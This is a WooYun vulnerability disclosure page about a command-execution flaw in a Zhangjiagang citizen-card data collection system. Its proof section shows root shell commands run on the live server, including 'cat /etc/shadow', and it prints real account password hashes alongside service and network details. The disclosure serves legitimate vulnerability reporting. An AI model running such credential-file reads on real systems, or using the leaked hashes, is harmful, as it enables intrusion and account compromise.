当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152874

漏洞标题:某市数据数据采集系统命令执行漏洞getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2015-11-10 14:00

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

0.jpg


张家港市民卡批量数据采集系统地址**.**.**.**:8080/dc-web-batch/login.action存在命令执行漏洞

00.png


直接上传木马到服务器

1.jpg

2.png

漏洞证明:

[/root/zjgweb/apache-tomcat-6.0.26/webapps/dc-web-batch/dc-web-batch/]$ whoami
root
/bin/sh: line 0: cd: /root/zjgweb/apache-tomcat-6.0.26/webapps/dc-web-batch/dc-web-batch/: No such file or directory
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ chkconfig --list
NetworkManager 	0:off	1:off	2:off	3:off	4:off	5:off	6:off
acpid          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
anacron        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
apmd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
atd            	0:off	1:off	2:off	3:on	4:on	5:on	6:off
auditd         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
autofs         	0:off	1:off	2:off	3:on	4:on	5:on	6:off
avahi-daemon   	0:off	1:off	2:off	3:on	4:on	5:on	6:off
avahi-dnsconfd 	0:off	1:off	2:off	3:off	4:off	5:off	6:off
bluetooth      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
capi           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
conman         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
cpuspeed       	0:off	1:on	2:on	3:on	4:on	5:on	6:off
crond          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
cups           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
dc_client      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
dc_server      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
dnsmasq        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
dund           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
firstboot      	0:off	1:off	2:off	3:on	4:off	5:on	6:off
gpm            	0:off	1:off	2:on	3:on	4:on	5:on	6:off
haldaemon      	0:off	1:off	2:off	3:on	4:on	5:on	6:off
hidd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
hplip          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
httpd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ip6tables      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
ipmi           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
iptables       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
irda           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
irqbalance     	0:off	1:off	2:on	3:on	4:on	5:on	6:off
isdn           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
kdump          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
kudzu          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
lm_sensors     	0:off	1:off	2:on	3:on	4:on	5:on	6:off
lvm2-monitor   	0:off	1:on	2:on	3:on	4:on	5:on	6:off
mcstrans       	0:off	1:off	2:on	3:on	4:on	5:on	6:off
mdmonitor      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
mdmpd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
messagebus     	0:off	1:off	2:off	3:on	4:on	5:on	6:off
microcode_ctl  	0:off	1:off	2:on	3:on	4:on	5:on	6:off
multipathd     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
mysql          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
netconsole     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
netfs          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
netplugd       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
network        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
nfs            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
nfslock        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
nscd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ntpd           	0:off	1:off	2:off	3:on	4:off	5:on	6:off
pand           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
pcscd          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
portmap        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
psacct         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rawdevices     	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rdisc          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
readahead_early	0:off	1:off	2:on	3:on	4:on	5:on	6:off
readahead_later	0:off	1:off	2:off	3:off	4:off	5:on	6:off
restorecond    	0:off	1:off	2:on	3:on	4:on	5:on	6:off
rhnsd          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcgssd        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcidmapd      	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcsvcgssd     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
saslauthd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sendmail       	0:off	1:off	2:on	3:on	4:on	5:on	6:off
setroubleshoot 	0:off	1:off	2:off	3:on	4:on	5:on	6:off
smartd         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
snmpd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
snmptrapd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
squid          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sshd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
syslog         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
sysstat        	0:off	1:off	2:on	3:on	4:off	5:on	6:off
tux            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
vncserver      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
vsftpd         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
wdaemon        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
winbind        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
wpa_supplicant 	0:off	1:off	2:off	3:off	4:off	5:off	6:off
xfs            	0:off	1:off	2:on	3:on	4:on	5:on	6:off
xinetd         	0:off	1:off	2:off	3:on	4:on	5:on	6:off
ypbind         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
yum-updatesd   	0:off	1:off	2:on	3:on	4:on	5:on	6:off
xinetd based services:
	chargen-dgram: 	off
	chargen-stream:	off
	daytime-dgram: 	off
	daytime-stream:	off
	discard-dgram: 	off
	discard-stream:	off
	echo-dgram:    	off
	echo-stream:   	off
	eklogin:       	off
	ekrb5-telnet:  	off
	gssftp:        	off
	klogin:        	off
	krb5-telnet:   	off
	kshell:        	off
	rmcp:          	off
	rsync:         	off
	tcpmux-server: 	off
	tftp:          	off
	time-dgram:    	off
	time-stream:   	off
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ chkconfig --list atd
atd            	0:off	1:off	2:off	3:on	4:on	5:on	6:off
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ cat /etc/shadow
root:$1$PO9ir4ss$woXEIjJBQJKtZrKC8vgaf/:14729:0:99999:7:::
bin:*:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
adm:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
shutdown:*:14728:0:99999:7:::
halt:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
operator:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
gopher:*:14728:0:99999:7:::
ftp:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
nscd:!!:14728:0:99999:7:::
vcsa:!!:14728:0:99999:7:::
rpc:!!:14728:0:99999:7:::
mailnull:!!:14728:0:99999:7:::
smmsp:!!:14728:0:99999:7:::
pcap:!!:14728:0:99999:7:::
ntp:!!:14728:0:99999:7:::
dbus:!!:14728:0:99999:7:::
avahi:!!:14728:0:99999:7:::
sshd:!!:14728:0:99999:7:::
rpcuser:!!:14728:0:99999:7:::
nfsnobody:!!:14728:0:99999:7:::
haldaemon:!!:14728:0:99999:7:::
avahi-autoipd:!!:14728:0:99999:7:::
distcache:!!:14728:0:99999:7:::
apache:!!:14728:0:99999:7:::
webalizer:!!:14728:0:99999:7:::
squid:!!:14728:0:99999:7:::
xfs:!!:14728:0:99999:7:::
gdm:!!:14728:0:99999:7:::
sabayon:!!:14728:0:99999:7:::
user:$1$pdDkOI6I$JFJtnnlfxENd6gZQ191yu1:14728:0:99999:7:::
mysql:$1$zUAcHuUD$7GeGTJKZyh7BMMiRzF3hI/:15000::::::
java:$1$ehUj3BS0$PC32eB20nINWl3JRAZwK.0:14790:0:99999:7:::
zjgsmk:$1$OmWE0ScG$Nmex0wNRsEAQ/Jk4y4Ull.:14790:0:99999:7:::
oracle:$1$R/c.mkOe$KkwTbjvZ2akuatr7KuMef1:16528:0:99999:7:::
digitalchina:$1$VhbxkMpi$kpKu0oLxU72wlSNeovgKu1:14865:0:99999:7:::
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr E4:1F:13:61:9B:10  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::e61f:13ff:fe61:9b10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:48601149 errors:0 dropped:0 overruns:0 frame:0
          TX packets:68442523 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3043477558 (2.8 GiB)  TX bytes:2002988966 (1.8 GiB)
          Interrupt:169 Memory:92000000-92012800 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:10353694 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10353694 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1929325397 (1.7 GiB)  TX bytes:1929325397 (1.7 GiB)
usb0      Link encap:Ethernet  HWaddr E6:1F:13:53:9B:13  
          inet6 addr: fe80::e41f:13ff:fe53:9b13/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5390460 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18 errors:9 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:350379900 (334.1 MiB)  TX bytes:4186 (4.0 KiB)
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ cat /etc/resolv.conf
search localdomain
nameserver **.**.**.**
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ bash prompt:
bash: prompt:: No such file or directory
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ lsb_release -a
LSB Version:	:core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID:	RedHatEnterpriseServer
Description:	Red Hat Enterprise Linux Server release 5.4 (Tikanga)
Release:	5.4
Codename:	Tikanga
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-20 17:26

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价